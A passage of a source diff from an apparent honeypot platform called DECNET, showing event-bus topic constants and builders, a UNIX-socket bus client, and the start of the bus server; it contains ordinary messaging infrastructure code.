# no publishers exist yet, but consumers (webhook worker, dashboard
|
||||
# SSE relay) can subscribe to ``identity.>`` from day one and receive
|
||||
# events the instant the clusterer comes online.
|
||||
#
|
||||
# identity.formed — clusterer creates a new identity from
|
||||
# one or more observations
|
||||
# identity.observation.linked — observation attached to an existing
|
||||
# identity (or reattached from another)
|
||||
# identity.merged — two identities collapsed; loser gets
|
||||
# ``merged_into_uuid`` set, subscribers
|
||||
# re-key cached references to the winner
|
||||
# identity.unmerged — revocable-merge undo: contradicting
|
||||
# evidence cleared ``merged_into_uuid``
|
||||
# and re-split observations. The
|
||||
# resurrected side's UUID is the same
|
||||
# as the prior loser, so subscribers
|
||||
# that cached references to the loser
|
||||
# during the merged interval can
|
||||
# re-attach without a new lookup.
|
||||
#
|
||||
# ``identity.campaign.assigned`` is published by the campaign clusterer
|
||||
# rather than the identity clusterer; see IDENTITY_CAMPAIGN_ASSIGNED below.
|
||||
IDENTITY_FORMED = "formed"
|
||||
IDENTITY_OBSERVATION_LINKED = "observation.linked"
|
||||
IDENTITY_MERGED = "merged"
|
||||
IDENTITY_UNMERGED = "unmerged"
|
||||
# Campaign-clusterer cross-family event — fires under ``identity.>`` so
|
||||
# identity-stream subscribers (e.g. the IdentityDetail SSE client) get
|
||||
# notified the moment an identity's ``campaign_id`` changes without
|
||||
# having to subscribe to the campaign topic family. The same event
|
||||
# fires under ``campaign.identity.assigned`` for campaign-side
|
||||
# subscribers.
|
||||
IDENTITY_CAMPAIGN_ASSIGNED = "campaign.assigned"
|
||||
|
||||
# Campaign-clusterer event types (second/third tokens under
|
||||
# ``campaign``). Mirror of the identity family at the layer above:
|
||||
# campaigns group identities into operations, and the clusterer
|
||||
# publishes the same form / link / merge / unmerge lifecycle.
|
||||
#
|
||||
# campaign.formed — clusterer creates a new campaign from
|
||||
# one or more identities
|
||||
# campaign.identity.assigned — identity attached to an existing
|
||||
# campaign (or reassigned from another)
|
||||
# campaign.merged — two campaigns collapsed; loser gets
|
||||
# ``merged_into_uuid`` set, subscribers
|
||||
# re-key cached references to the winner
|
||||
# campaign.unmerged — revocable-merge undo: contradicting
|
||||
# evidence cleared ``merged_into_uuid``
|
||||
# and re-split identities
|
||||
CAMPAIGN_FORMED = "formed"
|
||||
CAMPAIGN_IDENTITY_ASSIGNED = "identity.assigned"
|
||||
CAMPAIGN_MERGED = "merged"
|
||||
CAMPAIGN_UNMERGED = "unmerged"
|
||||
|
||||
# Credential event types (second/third tokens under ``credential``).
|
||||
# ``credential.captured`` fires once per upserted Credential row — the
|
||||
# correlator listens for it and runs the cred-reuse query in response,
|
||||
# so reuse detection latency is sub-second after a fresh capture.
|
||||
# ``credential.reuse.detected`` fires when the correlator inserts a new
|
||||
# CredentialReuse row or grows an existing one (added decky/service/IP).
|
||||
CREDENTIAL_CAPTURED = "captured"
|
||||
CREDENTIAL_REUSE_DETECTED = "reuse.detected"
|
||||
|
||||
# Canary-token event types (third token under ``canary``).
|
||||
#
|
||||
# canary.{token_id}.placed — orchestrator/API successfully planted a
|
||||
# canary artifact inside a decky's
|
||||
# filesystem (or persisted a passive token
|
||||
# that has no callback wiring). Lets
|
||||
# dashboards reflect baseline coverage in
|
||||
# real time without a DB poll.
|
||||
# canary.{token_id}.triggered — ``decnet canary`` worker observed a
|
||||
# callback hit (HTTP slug or DNS subdomain
|
||||
# lookup) for the token. Payload carries
|
||||
# ``src_ip``, ``user_agent``, ``request_path``
|
||||
# and any DNS qname so downstream
|
||||
# consumers (correlator, webhook fanout)
|
||||
# can attribute and forward without a
|
||||
# follow-up DB read.
|
||||
# canary.{token_id}.revoked — operator removed a token; planter unlinked
|
||||
# the file (best-effort) and the row was
|
||||
# marked ``revoked``. Subscribers may
|
||||
# evict cached lookups by token id.
|
||||
CANARY_PLACED = "placed"
|
||||
CANARY_TRIGGERED = "triggered"
|
||||
CANARY_REVOKED = "revoked"
|
||||
|
||||
# Orchestrator event types (second token under ``orchestrator``). The
|
||||
# orchestrator worker publishes one of these per synthetic action it
|
||||
# drives against a decky — cheap inter-decky traffic and filesystem
|
||||
# mutations whose role is to keep the honeypot from looking suspiciously
|
||||
# static. Always nested with the destination decky uuid as the third
|
||||
# token, so consumers can subscribe to a single decky's life-injection
|
||||
# stream via ``orchestrator.*.<decky_uuid>``.
|
||||
ORCHESTRATOR_TRAFFIC = "traffic"
|
||||
ORCHESTRATOR_FILE = "file"
|
||||
# Emailgen — published by the ``decnet emailgen`` worker once per generated
|
||||
# fake email delivered into a mail decky's maildir. Third token is the
|
||||
# destination mail-decky uuid (the IMAP/POP3 host serving the mailbox),
|
||||
# matching the ``orchestrator.*.<decky_uuid>`` subscription pattern.
|
||||
ORCHESTRATOR_EMAIL = "email"
|
||||
|
||||
# System event types.
|
||||
SYSTEM_LOG = "log"
|
||||
SYSTEM_BUS_HEALTH = "bus.health"
|
||||
# Worker-health leaf — built per-worker as ``system.<worker>.health`` via
|
||||
# :func:`system_health`. The leaf constant stays the same across workers;
|
||||
# the worker name goes in the middle token.
|
||||
SYSTEM_HEALTH = "health"
|
||||
# Worker-control leaf — built per-worker as ``system.<worker>.control`` via
|
||||
# :func:`system_control`. Admin-originated stop intents travel on this
|
||||
# topic; each worker subscribes to its own.
|
||||
SYSTEM_CONTROL = "control"
|
||||
|
||||
# Control payload ``action`` values — the wire vocabulary. Only ``stop`` is
|
||||
# handled in v1; ``start`` is reserved because a stopped worker has no
|
||||
# subscriber, so starting requires external supervision (systemd).
|
||||
WORKER_CONTROL_STOP = "stop"
|
||||
WORKER_CONTROL_START = "start"
|
||||
|
||||
# Webhook subscription-set changed — published by the CRUD router after any
|
||||
# create / update / delete on WebhookSubscription so the webhook worker can
|
||||
# reload its in-memory subscription list and re-subscribe to the new union
|
||||
# of patterns. Payload is currently empty; consumers only need the signal.
|
||||
WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
|
||||
|
||||
|
||||
# ─── Builders ────────────────────────────────────────────────────────────────
|
||||
|
||||
def topology_mutation(topology_id: str, state: str) -> str:
    """Return the topic ``topology.<topology_id>.mutation.<state>``.

    *state* is expected to be one of the ``MUTATION_*`` constants; that is
    a convention, not something this builder enforces.

    Raises:
        ValueError: if either argument is rejected by :func:`_reject_tokens`
            (empty, or containing ``.``, ``*``, ``>`` or whitespace).
    """
    # Validate first so a malformed segment never reaches the wire.
    _reject_tokens(topology_id, state)
    prefix = f"{TOPOLOGY}.{topology_id}"
    return f"{prefix}.mutation.{state}"
|
||||
|
||||
|
||||
def topology_status(topology_id: str) -> str:
    """Return the topic ``topology.<topology_id>.status``.

    Raises:
        ValueError: if *topology_id* is rejected by :func:`_reject_tokens`.
    """
    _reject_tokens(topology_id)
    return "{}.{}.{}".format(TOPOLOGY, topology_id, TOPOLOGY_STATUS)
|
||||
|
||||
|
||||
def decky(decky_id: str, event_type: str) -> str:
    """Return the topic ``decky.<decky_id>.<event_type>``.

    *event_type* is normally one of the ``DECKY_*`` leaf constants
    (``DECKY_STATE``, ``DECKY_TRAFFIC``, ``DECKY_MUTATE_REQUEST``,
    ``DECKY_MUTATION``). It must be a single token: dotted leaves are
    rejected here.

    Raises:
        ValueError: if either argument is rejected by :func:`_reject_tokens`.
    """
    _reject_tokens(decky_id, event_type)
    owner = f"{DECKY}.{decky_id}"
    return f"{owner}.{event_type}"
|
||||
|
||||
|
||||
def decky_mutation(decky_id: str) -> str:
    """Return the topic ``decky.<decky_id>.mutation``.

    Raises:
        ValueError: if *decky_id* is rejected by :func:`_reject_tokens`.
    """
    _reject_tokens(decky_id)
    return "{}.{}.{}".format(DECKY, decky_id, DECKY_MUTATION)
|
||||
|
||||
|
||||
def system(event_type: str) -> str:
    """Return the topic ``system.<event_type>``.

    Only emptiness is checked. *event_type* is deliberately not passed
    through the segment validator, so dotted leaves such as ``bus.health``
    are accepted and simply prefixed with the ``system`` root.

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{SYSTEM}.{event_type}"
    raise ValueError("system topic requires a non-empty event_type")
|
||||
|
||||
|
||||
def credential(event_type: str) -> str:
    """Return the topic ``credential.<event_type>``.

    *event_type* is normally :data:`CREDENTIAL_CAPTURED` or
    :data:`CREDENTIAL_REUSE_DETECTED`. Only emptiness is checked, so
    dotted leaves (``reuse.detected``) pass through unchanged.

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{CREDENTIAL}.{event_type}"
    raise ValueError("credential topic requires a non-empty event_type")
|
||||
|
||||
|
||||
def attacker(event_type: str) -> str:
    """Return the topic ``attacker.<event_type>``.

    *event_type* is normally one of the ``ATTACKER_*`` leaf constants
    (``ATTACKER_OBSERVED``, ``ATTACKER_SCORED``, ``ATTACKER_FINGERPRINTED``,
    ``ATTACKER_SESSION_STARTED``, ``ATTACKER_SESSION_ENDED``,
    ``ATTACKER_INTEL_ENRICHED``). Only emptiness is checked, so dotted
    leaves (``session.started``) pass through unchanged.

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{ATTACKER}.{event_type}"
    raise ValueError("attacker topic requires a non-empty event_type")
|
||||
|
||||
|
||||
def campaign(event_type: str) -> str:
    """Return the topic ``campaign.<event_type>``.

    *event_type* is normally :data:`CAMPAIGN_FORMED`,
    :data:`CAMPAIGN_IDENTITY_ASSIGNED`, :data:`CAMPAIGN_MERGED` or
    :data:`CAMPAIGN_UNMERGED`. Only emptiness is checked, so dotted
    leaves (``identity.assigned``) pass through unchanged.

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{CAMPAIGN}.{event_type}"
    raise ValueError("campaign topic requires a non-empty event_type")
|
||||
|
||||
|
||||
def identity(event_type: str) -> str:
    """Return the topic ``identity.<event_type>``.

    *event_type* is normally :data:`IDENTITY_FORMED`,
    :data:`IDENTITY_OBSERVATION_LINKED`, :data:`IDENTITY_MERGED`,
    :data:`IDENTITY_UNMERGED` or :data:`IDENTITY_CAMPAIGN_ASSIGNED`.
    Only emptiness is checked, so dotted leaves (``observation.linked``)
    pass through unchanged.

    Raises:
        ValueError: if *event_type* is empty.
    """
    if event_type:
        return f"{IDENTITY}.{event_type}"
    raise ValueError("identity topic requires a non-empty event_type")
|
||||
|
||||
|
||||
def orchestrator(event_type: str, decky_id: str) -> str:
    """Return the topic ``orchestrator.<event_type>.<decky_id>``.

    *event_type* is normally :data:`ORCHESTRATOR_TRAFFIC`,
    :data:`ORCHESTRATOR_FILE` or :data:`ORCHESTRATOR_EMAIL`. The
    destination decky id is placed last so a per-decky subscriber can use
    the pattern ``orchestrator.*.<decky_uuid>``.

    Raises:
        ValueError: if either argument is rejected by :func:`_reject_tokens`.
    """
    _reject_tokens(event_type, decky_id)
    family = f"{ORCHESTRATOR}.{event_type}"
    return f"{family}.{decky_id}"
|
||||
|
||||
|
||||
def canary(token_id: str, event_type: str) -> str:
    """Return the topic ``canary.<token_id>.<event_type>``.

    *event_type* is normally :data:`CANARY_PLACED`,
    :data:`CANARY_TRIGGERED` or :data:`CANARY_REVOKED`. The token id sits
    in the second position so one token can be followed with
    ``canary.<token_id>.>`` and the whole fleet with ``canary.>``.

    Raises:
        ValueError: if either argument is rejected by :func:`_reject_tokens`.
    """
    _reject_tokens(token_id, event_type)
    scope = f"{CANARY}.{token_id}"
    return f"{scope}.{event_type}"
|
||||
|
||||
|
||||
def system_health(worker: str) -> str:
    """Return the topic ``system.<worker>.health``.

    The worker name is the middle token, so ``system.*.health`` covers
    every worker and ``system.mutator.health`` selects a single one.
    *worker* must be a plain segment (no dots, wildcards or whitespace).

    Raises:
        ValueError: if *worker* is rejected by :func:`_reject_tokens`.
    """
    _reject_tokens(worker)
    return "{}.{}.{}".format(SYSTEM, worker, SYSTEM_HEALTH)
|
||||
|
||||
|
||||
def system_control(worker: str) -> str:
    """Return the topic ``system.<worker>.control``.

    This is the per-worker address for admin-originated control intents.
    The documented payload shape is::

        {"action": "stop", "requested_by": "<username>", "ts": <unix>}

    where *action* is one of :data:`WORKER_CONTROL_STOP` /
    :data:`WORKER_CONTROL_START`. This builder only assembles the topic
    string; it does not inspect or validate payloads. *worker* follows the
    same segment rules as :func:`system_health`.

    Raises:
        ValueError: if *worker* is rejected by :func:`_reject_tokens`.
    """
    _reject_tokens(worker)
    return "{}.{}.{}".format(SYSTEM, worker, SYSTEM_CONTROL)
|
||||
|
||||
|
||||
def _reject_tokens(*parts: str) -> None:
    """Validate that every argument is usable as a single topic token.

    A segment containing a dot would silently add a level to the hierarchy
    (a ``topology_id`` of ``"a.b"`` would yield ``topology.a.b.status``),
    and wildcard characters or whitespace would corrupt matching. Failing
    here keeps malformed topics from being built at all.

    Raises:
        ValueError: if any segment is empty, or contains ``.``, ``*``,
            ``>`` or a whitespace character.
    """
    for segment in parts:
        if not segment:
            raise ValueError("topic segment must not be empty")
        # One pass over the characters: reserved punctuation or whitespace.
        offending = any(ch in ".*>" or ch.isspace() for ch in segment)
        if offending:
            raise ValueError(
                f"topic segment {segment!r} may not contain '.', '*', '>', or whitespace"
            )
|
||||
@@ -1,257 +0,0 @@
|
||||
"""UNIX-socket client — :class:`UnixSocketBus` implementation of :class:`BaseBus`.
|
||||
|
||||
Holds one open socket to the local :class:`~decnet.bus.unix_server.BusServer`.
|
||||
Operations:
|
||||
|
||||
* :meth:`publish` writes a single ``PUB`` frame and returns; no ack.
|
||||
* :meth:`subscribe` writes a ``SUB`` frame and returns a
|
||||
:class:`~decnet.bus.base.Subscription` backed by an :class:`asyncio.Queue`
|
||||
that the background reader task feeds.
|
||||
|
||||
One background reader task per bus instance dispatches incoming ``EVT``
|
||||
frames to every registered subscription whose pattern matches the topic.
|
||||
On connection drop or close, every subscription is woken via a sentinel so
|
||||
iterators unblock cleanly; callers see :class:`StopAsyncIteration` from the
|
||||
``async for`` loop.
|
||||
|
||||
No auto-reconnect in MVP. If the server restarts, callers must
|
||||
:meth:`close` the bus and construct a new one. This mirrors how other
|
||||
DECNET workers handle their dependencies — the systemd ``Restart=on-failure``
|
||||
supervision above us is the retry loop.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import contextlib
|
||||
import os
|
||||
import pathlib
|
||||
from typing import Any
|
||||
|
||||
from decnet.bus import protocol
|
||||
from decnet.bus.base import (
|
||||
BaseBus,
|
||||
Event,
|
||||
Subscription,
|
||||
_CLOSE_SENTINEL,
|
||||
matches,
|
||||
)
|
||||
from decnet.bus.fake import _enqueue_drop_oldest as _enqueue_event_drop_oldest
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.client")
|
||||
|
||||
_INBOUND_QUEUE_SIZE = 1024
|
||||
|
||||
|
||||
class _UnixSubscription(Subscription):
    """Subscription handle whose events arrive through an asyncio queue.

    The owning :class:`UnixSocketBus` pushes matching events (and, on
    shutdown, the close sentinel) into ``_queue``; iteration pulls from it.
    """

    def __init__(
        self,
        bus: "UnixSocketBus",
        pattern: str,
        queue: "asyncio.Queue[Any]",
    ) -> None:
        super().__init__(pattern)
        self._queue = queue
        self._bus = bus

    async def __anext__(self) -> Event:
        """Return the next queued event, or stop once closed."""
        # ``_closed`` is not set in this class — presumably maintained by
        # the Subscription base; confirm against decnet.bus.base.
        if self._closed:
            raise StopAsyncIteration
        item = await self._queue.get()
        if item is not _CLOSE_SENTINEL:
            return item
        raise StopAsyncIteration

    async def _aclose(self) -> None:
        """Detach from the bus, then nudge any waiter with the sentinel."""
        await self._bus._unregister(self)
        # Best effort: a full queue simply does not receive the sentinel.
        with contextlib.suppress(asyncio.QueueFull):
            self._queue.put_nowait(_CLOSE_SENTINEL)
|
||||
|
||||
|
||||
class UnixSocketBus(BaseBus):
    """Client handle for a local :class:`BusServer`.

    One instance per process typically; multiple instances simply open
    multiple sockets to the same server. Connection is lazy — the socket
    is opened by the first :meth:`connect`, :meth:`publish`, or the SUB
    frame scheduled by :meth:`subscribe`.

    Concurrency notes:

    * ``_lock`` serialises :meth:`connect` so that a lazy publish racing a
      scheduled SUB cannot open two sockets.
    * ``_write_lock`` serialises frame writes on the shared stream.
    """

    def __init__(
        self,
        socket_path: pathlib.Path | str,
        *,
        client_name: str | None = None,
    ) -> None:
        self._path = pathlib.Path(socket_path)
        self._client_name = client_name or f"decnet-bus-client[{os.getpid()}]"
        self._reader: asyncio.StreamReader | None = None
        self._writer: asyncio.StreamWriter | None = None
        self._reader_task: asyncio.Task[None] | None = None
        self._subs: list[_UnixSubscription] = []
        self._lock = asyncio.Lock()
        self._write_lock = asyncio.Lock()
        self._closed = False
        # Sticky flag: the first publish-on-closed-bus call logs at
        # WARNING so operators see that a publish was dropped; subsequent
        # calls on the same instance log at DEBUG only to prevent a
        # log flood when stream threads drain after close. The bus is
        # critical infra, so the first warning is non-negotiable.
        self._closed_publish_warned = False
        # Strong references to in-flight SUB tasks. The event loop only
        # keeps weak references to tasks, so an unreferenced task may be
        # garbage-collected before it finishes.
        self._pending_tasks: set[asyncio.Future[None]] = set()

    # ─── Lifecycle ──────────────────────────────────────────────────────────

    async def connect(self) -> None:
        """Open the socket, send HELLO and start the reader task.

        Idempotent and safe to call concurrently: only one caller opens
        the connection, the others return once it is established.

        Raises:
            RuntimeError: if the bus has already been closed.
            OSError: if the socket cannot be opened or HELLO cannot be sent.
        """
        if self._writer is not None:
            return
        if self._closed:
            raise RuntimeError("connect on closed bus")
        async with self._lock:
            # Re-check under the lock: another task may have connected
            # (or the bus may have been closed) while we were waiting.
            if self._writer is not None:
                return
            if self._closed:
                raise RuntimeError("connect on closed bus")
            reader, writer = await asyncio.open_unix_connection(str(self._path))
            try:
                # HELLO goes out before the writer is published on self,
                # so no other frame can overtake it.
                writer.write(protocol.encode(protocol.HELLO, args=self._client_name))
                await writer.drain()
            except BaseException:
                # Do not leak a half-initialised socket.
                writer.close()
                raise
            self._reader, self._writer = reader, writer
            self._reader_task = asyncio.create_task(self._reader_loop())
        log.debug("bus.client: connected to %s as %s", self._path, self._client_name)

    async def close(self) -> None:
        """Tear the connection down and wake every subscription.

        Safe to call more than once; later calls are no-ops.
        """
        if self._closed:
            return
        self._closed = True

        # Best-effort BYE — we don't care if it fails.
        if self._writer is not None and not self._writer.is_closing():
            with contextlib.suppress(Exception):
                await self._send(protocol.encode(protocol.BYE))

        if self._reader_task is not None:
            self._reader_task.cancel()
            with contextlib.suppress(asyncio.CancelledError):
                await self._reader_task
            self._reader_task = None

        if self._writer is not None:
            with contextlib.suppress(Exception):
                self._writer.close()
                await self._writer.wait_closed()
            self._writer = None
            self._reader = None

        # Wake every subscription so `async for` exits.
        for sub in list(self._subs):
            self._wake(sub)
        self._subs.clear()

    # ─── Pub/Sub ────────────────────────────────────────────────────────────

    async def publish(
        self,
        topic: str,
        payload: dict[str, Any],
        *,
        event_type: str = "",
    ) -> None:
        """Send one ``PUB`` frame for *topic*; fire-and-forget, no ack.

        On a closed bus the event is dropped and logged, not raised. A
        connection failure while sending is logged as a warning.
        """
        if self._closed:
            # Degrade gracefully: the DB is the source of truth, the bus
            # is only the notification layer. Raising here made every
            # caller via publish_safely flood the logs once per stream
            # line during shutdown races. First drop warns loudly;
            # subsequent drops on the same instance are DEBUG-only.
            if not self._closed_publish_warned:
                self._closed_publish_warned = True
                log.warning(
                    "bus.client: publish on closed bus dropped topic=%s "
                    "(further drops on this instance logged at DEBUG)",
                    topic,
                )
            else:
                log.debug("bus.client: publish on closed bus dropped topic=%s", topic)
            return
        if self._writer is None:
            await self.connect()
        body = Event(topic=topic, payload=payload, type=event_type).to_dict()
        try:
            await self._send(protocol.encode(protocol.PUB, args=topic, body=body))
        except (ConnectionError, BrokenPipeError) as exc:
            # Bus loss is a logged warning, never a publisher crash. The
            # DB-as-source-of-truth invariant means the work is already
            # persisted; the missing event is just a missed notification.
            log.warning("bus.client: publish failed: %s", exc)

    def subscribe(self, pattern: str) -> Subscription:
        """Register a local subscription and schedule its ``SUB`` frame.

        Raises:
            RuntimeError: if the bus has already been closed.
        """
        if self._closed:
            raise RuntimeError("subscribe on closed bus")
        queue: asyncio.Queue[Any] = asyncio.Queue(maxsize=_INBOUND_QUEUE_SIZE)
        sub = _UnixSubscription(self, pattern, queue)
        self._subs.append(sub)
        # Schedule the SUB frame asynchronously so subscribe() stays sync,
        # matching the BaseBus signature. The caller will shortly `async
        # with` / `async for` the subscription, which will run the event
        # loop and pick this task up.
        task = asyncio.ensure_future(self._send_sub(pattern))
        # Hold a reference until the task completes (see __init__).
        self._pending_tasks.add(task)
        task.add_done_callback(self._pending_tasks.discard)
        return sub

    async def _send_sub(self, pattern: str) -> None:
        """Connect if needed and send ``SUB``; failures are only logged."""
        try:
            if self._writer is None:
                await self.connect()
            await self._send(protocol.encode(protocol.SUB, args=pattern))
        except Exception as exc:  # pragma: no cover - network paths in live tests
            log.warning("bus.client: SUB %s failed: %s", pattern, exc)

    async def _unregister(self, sub: _UnixSubscription) -> None:
        """Drop *sub* locally and send ``UNSUB`` if its pattern is now unused."""
        try:
            self._subs.remove(sub)
        except ValueError:
            return
        # Tell the server we no longer want events for this pattern if no
        # other local subscription still wants it.
        if not any(s.pattern == sub.pattern for s in self._subs):
            with contextlib.suppress(Exception):
                await self._send(protocol.encode(protocol.UNSUB, args=sub.pattern))

    # ─── Internal I/O ───────────────────────────────────────────────────────

    async def _send(self, frame_bytes: bytes) -> None:
        """Write one encoded frame and drain, serialised by ``_write_lock``.

        Raises:
            ConnectionError: if no connection is open.
        """
        if self._writer is None:
            raise ConnectionError("bus.client: not connected")
        async with self._write_lock:
            self._writer.write(frame_bytes)
            await self._writer.drain()

    async def _reader_loop(self) -> None:
        """Read frames until EOF/BYE/error and dispatch ``EVT`` frames.

        Whatever ends the loop, every subscription is woken on the way out.
        """
        if self._reader is None:
            return
        try:
            while True:
                frame = await protocol.read_frame(self._reader)
                if frame is None:
                    break
                if frame.verb != protocol.EVT:
                    # Clients only ever legitimately receive EVT (or BYE).
                    if frame.verb == protocol.BYE:
                        break
                    log.warning("bus.client: unexpected verb from server: %s", frame.verb)
                    continue
                topic = frame.args
                data = protocol.decode_body(frame.body) if frame.body else {}
                event = Event.from_dict(topic, data)
                self._dispatch(event)
        except protocol.ProtocolError as exc:
            log.warning("bus.client: protocol error: %s", exc)
        except (asyncio.IncompleteReadError, ConnectionError):
            pass
        except asyncio.CancelledError:
            raise
        except Exception:  # pragma: no cover
            log.exception("bus.client: reader loop crashed")
        finally:
            # Server-side close — wake every subscription.
            for sub in list(self._subs):
                self._wake(sub)

    def _dispatch(self, event: Event) -> None:
        """Enqueue *event* on every subscription whose pattern matches."""
        for sub in self._subs:
            if matches(sub.pattern, event.topic):
                _enqueue_event_drop_oldest(sub._queue, event)

    @staticmethod
    def _wake(sub: _UnixSubscription) -> None:
        """Deliver the close sentinel to *sub*, even if its queue is full.

        If the sentinel were simply dropped on a full queue, the consumer
        would drain the backlog and then block forever on ``queue.get()``.
        Instead the oldest pending item is evicted to make room.
        """
        queue = sub._queue
        try:
            queue.put_nowait(_CLOSE_SENTINEL)
        except asyncio.QueueFull:
            with contextlib.suppress(asyncio.QueueEmpty):
                queue.get_nowait()
            with contextlib.suppress(asyncio.QueueFull):
                queue.put_nowait(_CLOSE_SENTINEL)
|
||||
@@ -1,309 +0,0 @@
|
||||
"""UNIX-socket server for the DECNET bus.
|
||||
|
||||
One :class:`BusServer` per host. Accepts local connections on a UNIX-domain
|
||||
socket; each connection may:
|
||||
|
||||
* publish events (``PUB`` frames) that the server fans out to all matching
|
||||
subscribers on other connections, and
|
||||
* subscribe to patterns (``SUB`` frames) and receive matching events as
|
||||
``EVT`` frames.
|
||||
|
||||
Authorization is socket file permissions (0660, group=``decnet`` if that
|
||||
POSIX group exists, else the server process's own group). Anything the
|
||||
kernel lets ``connect()`` is trusted — there is no verb-level auth. This
|
||||
matches the "local processes on the same host" threat model; cross-host
|
||||
federation is out of scope (see DEBT-029).
|
||||
|
||||
Backpressure is per-connection, drop-oldest: if a subscriber can't drain its
|
||||
outbound queue fast enough, the server discards the oldest pending event
|
||||
rather than blocking publishers. The bus is at-most-once by contract, so
|
||||
drops are acceptable; stalled publishers are not.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import contextlib
|
||||
import grp
|
||||
import os
|
||||
import pathlib
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any
|
||||
|
||||
from decnet.bus import protocol
|
||||
from decnet.bus.base import Event, matches
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.server")
|
||||
|
||||
_SOCKET_MODE = 0o660
|
||||
_DEFAULT_GROUP = "decnet"
|
||||
_OUTBOUND_QUEUE_SIZE = 1024
|
||||
|
||||
|
||||
@dataclass(eq=False)
class _Connection:
    """Per-connection server state.

    ``eq=False`` keeps the default identity-based equality and hashing.
    """

    # Stream used to send frames back to this peer.
    writer: asyncio.StreamWriter
    # Display name used in log messages.
    peer_name: str = "<unknown>"
    # Topic patterns recorded for this connection.
    patterns: set[str] = field(default_factory=set)
    # Encoded frames waiting to be written, bounded by _OUTBOUND_QUEUE_SIZE.
    outbound: asyncio.Queue[bytes] = field(
        default_factory=lambda: asyncio.Queue(maxsize=_OUTBOUND_QUEUE_SIZE),
    )
    closed: bool = False
|
||||
|
||||
|
||||
class BusServer:
|
||||
"""Serve a UNIX-socket bus on *socket_path*.
|
||||
|
||||
Lifecycle: construct → :meth:`start` → :meth:`serve_forever` (or rely
|
||||
on :meth:`start` returning once bound) → :meth:`close` for teardown.
|
||||
Safe to :meth:`close` multiple times.
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
socket_path: pathlib.Path | str,
|
||||
*,
|
||||
group: str | None = _DEFAULT_GROUP,
|
||||
mode: int = _SOCKET_MODE,
|
||||
) -> None:
|
||||
self._path = pathlib.Path(socket_path)
|
||||
self._group = group
|
||||
self._mode = mode
|
||||
self._server: asyncio.base_events.Server | None = None
|
||||
self._connections: set[_Connection] = set()
|
||||
self._closed = False
|
||||
|
||||
# ─── Lifecycle ──────────────────────────────────────────────────────────
|
||||
|
||||
async def start(self) -> None:
|
||||
"""Bind the socket and begin accepting connections.
|
||||
|
||||
Removes any stale socket file at *socket_path* first (common case:
|
||||
the previous worker crashed without cleaning up). The parent
|
||||
directory must already exist; we do NOT create it blindly because
|
||||
the chosen directory (typically ``/run/decnet``) may require
|
||||
systemd ``RuntimeDirectory=`` to set up.
|
||||
"""
|
||||
if self._server is not None:
|
||||
return
|
||||
|
||||
parent = self._path.parent
|
||||
if not parent.exists():
|
||||
raise FileNotFoundError(
|
||||
f"bus socket parent directory {parent} does not exist; "
|
||||
f"create it with systemd RuntimeDirectory= or mkdir"
|
||||
)
|
||||
|
||||
# Clean up a stale socket from a previous crash. If a live server
|
||||
# is actually listening there, ``bind()`` below will fail — we do
|
||||
# not try to detect live vs. stale ourselves.
|
||||
with contextlib.suppress(FileNotFoundError):
|
||||
if self._path.is_socket():
|
||||
self._path.unlink()
|
||||
|
||||
self._server = await asyncio.start_unix_server(
|
||||
self._handle_connection, path=str(self._path),
|
||||
)
|
||||
_chmod_and_chown(self._path, self._mode, self._group)
|
||||
log.info("bus.server: listening on %s (mode=%o group=%s)",
|
||||
self._path, self._mode, self._group or "<inherit>")
|
||||
|
||||
async def serve_forever(self) -> None:
|
||||
if self._server is None:
|
||||
raise RuntimeError("BusServer not started")
|
||||
async with self._server:
|
||||
await self._server.serve_forever()
|
||||
|
||||
async def close(self) -> None:
|
||||
if self._closed:
|
||||
return
|
||||
self._closed = True
|
||||
|
||||
if self._server is not None:
|
||||
self._server.close()
|
||||
with contextlib.suppress(Exception):
|
||||
await self._server.wait_closed()
|
||||
self._server = None
|
||||
|
||||
# Drain every live connection.
|
||||
for conn in list(self._connections):
|
||||
await self._close_connection(conn)
|
||||
self._connections.clear()
|
||||
|
||||
with contextlib.suppress(FileNotFoundError):
|
||||
self._path.unlink()
|
||||
log.info("bus.server: closed")
|
||||
|
||||
# ─── Internal publish fan-out ───────────────────────────────────────────
|
||||
|
||||
async def publish(self, topic: str, payload: dict[str, Any], event_type: str = "") -> None:
|
||||
"""Server-side publish helper — used by the worker to emit
|
||||
``system.bus.health`` heartbeats without opening a client loop."""
|
||||
event = Event(topic=topic, payload=payload, type=event_type)
|
||||
self._fanout(event)
|
||||
|
||||
# ─── Connection handler ─────────────────────────────────────────────────
|
||||
|
||||
async def _handle_connection(
    self,
    reader: asyncio.StreamReader,
    writer: asyncio.StreamWriter,
) -> None:
    """Run one client connection from accept to teardown.

    Registers the connection, starts its writer task, runs the reader
    loop until it returns or fails, and always cleans up afterwards.
    """
    conn = _Connection(writer=writer)
    self._connections.add(conn)
    pump = asyncio.create_task(self._writer_loop(conn))
    try:
        await self._reader_loop(conn, reader)
    except protocol.ProtocolError as err:
        log.warning("bus.server: protocol error from %s: %s", conn.peer_name, err)
    except (asyncio.IncompleteReadError, ConnectionError) as err:
        log.debug("bus.server: %s disconnected: %s", conn.peer_name, err)
    except Exception:  # pragma: no cover - defensive
        log.exception("bus.server: unhandled error in connection")
    finally:
        # Teardown order: close the socket, forget the connection, then
        # stop the writer task and wait for it to finish.
        await self._close_connection(conn)
        self._connections.discard(conn)
        pump.cancel()
        with contextlib.suppress(asyncio.CancelledError):
            await pump
|
||||
|
||||
async def _reader_loop(
    self, conn: _Connection, reader: asyncio.StreamReader,
) -> None:
    """Read frames from *reader* and dispatch each one.

    Returns when ``protocol.read_frame`` yields ``None`` or right after
    a ``BYE`` frame has been dispatched.
    """
    while (frame := await protocol.read_frame(reader)) is not None:
        await self._dispatch(conn, frame)
        if frame.verb == protocol.BYE:
            break
|
||||
|
||||
async def _dispatch(self, conn: _Connection, frame: protocol.Frame) -> None:
